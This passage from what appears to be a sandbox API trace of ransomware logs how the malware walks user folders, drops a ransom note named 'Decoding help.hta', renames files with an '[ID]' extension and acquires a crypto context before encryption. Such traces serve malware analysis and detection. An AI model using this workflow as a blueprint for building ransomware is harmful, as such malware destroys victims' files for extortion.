dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.070] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.070] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x14e1fd30 | out: lpFindFileData=0x14e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Firefox", cAlternateFileName="")) returned 1 [0060.070] lstrcmpW (lpString1=".", lpString2="Firefox") returned -1 [0060.070] lstrcmpW (lpString1="..", lpString2="Firefox") returned -1 [0060.070] lstrcmpiW (lpString1="windows", lpString2="Firefox") returned 1 [0060.071] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*" [0060.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*") returned 59 [0060.071] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\", lpString2="Firefox" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox" [0060.071] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\*.*" [0060.071] GlobalMemoryStatus (in: lpBuffer=0x14e1fd10 | out: lpBuffer=0x14e1fd10) [0060.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4268730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c8 [0060.078] CloseHandle (hObject=0x3c8) returned 1 [0060.078] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x14e1fd30 | out: lpFindFileData=0x14e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="updates", cAlternateFileName="")) returned 1 [0060.078] lstrcmpW (lpString1=".", lpString2="updates") returned -1 [0060.078] lstrcmpW (lpString1="..", lpString2="updates") returned -1 [0060.078] lstrcmpiW (lpString1="windows", lpString2="updates") returned 1 [0060.079] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*" [0060.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*") returned 59 [0060.079] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\", lpString2="updates" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates" [0060.079] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*.*" [0060.079] GlobalMemoryStatus (in: lpBuffer=0x14e1fd10 | out: lpBuffer=0x14e1fd10) [0060.079] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a980b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3c8 [0060.085] CloseHandle (hObject=0x3c8) returned 1 [0060.085] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x14e1fd30 | out: lpFindFileData=0x14e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7314c10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="updates", cAlternateFileName="")) returned 0 [0060.086] FindClose (in: hFindFile=0x5a5db0 | out: hFindFile=0x5a5db0) returned 1 Thread: id = 949 os_tid = 0x328 [0060.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x1559fd30 | out: lpFindFileData=0x1559fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 950 os_tid = 0xa70 [0060.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*.*", lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5b70 [0060.084] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.085] FindNextFileW (in: hFindFile=0x5a5b70, lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.085] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.085] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.085] FindNextFileW (in: hFindFile=0x5a5b70, lpFindFileData=0x160dfd30 | out: lpFindFileData=0x160dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.085] FindClose (in: hFindFile=0x5a5b70 | out: hFindFile=0x5a5b70) returned 1 Thread: id = 951 os_tid = 0x948 [0060.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*", lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x2bc21fb0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2bc21fb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5db0 [0060.090] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.090] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x2bc21fb0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2bc21fb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.091] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.091] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.091] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x298b9870, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x298b9870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2bc21fb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0060.091] lstrcpyW (in: lpString1=0x4280798, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" [0060.091] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned 100 [0060.091] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta" [0060.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\decoding help.hta")) returned 0x1 [0060.091] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0060.091] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="WINDOW~1._ID")) returned 1 [0060.091] lstrcpyW (in: lpString1=0x4280798, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" [0060.091] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned 100 [0060.091] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta" [0060.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\decoding help.hta")) returned 0x1 [0060.091] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Windows6.1-KB2999226-x64.msu.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0060.091] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu.[ID]g9uZrLhJaygpwRm1[ID]") returned 53 [0060.091] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0060.091] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="WINDOW~1._ID")) returned 0 [0060.091] FindClose (in: hFindFile=0x5a5db0 | out: hFindFile=0x5a5db0) returned 1 Thread: id = 952 os_tid = 0xc30 [0060.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*", lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1b231e70, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1b231e70, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5db0 [0060.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.097] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1b231e70, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1b231e70, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.097] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.097] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.097] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x16c9fd30 | out: lpFindFileData=0x16c9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdd4c3220, ftCreationTime.dwHighDateTime=0x1d4d41f, ftLastAccessTime.dwLowDateTime=0xf14c3220, ftLastAccessTime.dwHighDateTime=0x1d4d00a, ftLastWriteTime.dwLowDateTime=0xf14c3220, ftLastWriteTime.dwHighDateTime=0x1d4d00a, nFileSizeHigh=0x0, nFileSizeLow=0xf8f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="-c1uMB.png", cAlternateFileName="")) returned 1 [0060.097] lstrcpyW (in: lpString1=0x4280798, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*" [0060.097] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*") returned 56 [0060.097] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Decoding help.hta" [0060.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\decoding help.hta")) returned 0xffffffff [0060.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0061.447] WriteFile (in: hFile=0x378, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x16c9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x16c9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.448] CloseHandle (hObject=0x378) returned 1 [0061.448] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.448] lstrcmpiW (lpString1="Decoding help.hta", lpString2="-c1uMB.png") returned 1 [0061.448] lstrlenW (lpString="-c1uMB.png") returned 10 [0061.448] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*" [0061.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*") returned 56 [0061.449] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpString2="-c1uMB.png" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png" [0061.449] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png" [0061.449] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-c1umb.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-c1umb.png.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-c1uMB.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-c1umb.png.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0061.450] CreateFileMappingA (hFile=0x378, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5a8 [0061.450] CryptAcquireContextA (phProv=0x16c9fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 953 os_tid = 0xc28 [0060.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*.*", lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5b70 [0060.102] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.102] FindNextFileW (in: hFindFile=0x5a5b70, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.102] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.102] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.102] FindNextFileW (in: hFindFile=0x5a5b70, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0060.102] lstrcmpW (lpString1=".", lpString2="Dictionaries") returned -1 [0060.102] lstrcmpW (lpString1="..", lpString2="Dictionaries") returned -1 [0060.102] lstrcmpiW (lpString1="windows", lpString2="Dictionaries") returned 1 [0060.102] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*.*" [0060.102] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*.*") returned 71 [0060.102] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="Dictionaries" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0060.102] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*.*" [0060.102] GlobalMemoryStatus (in: lpBuffer=0xf10fd10 | out: lpBuffer=0xf10fd10) [0060.102] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a9b0c18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5dc [0060.109] CloseHandle (hObject=0x5dc) returned 1 [0060.109] FindNextFileW (in: hFindFile=0x5a5b70, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 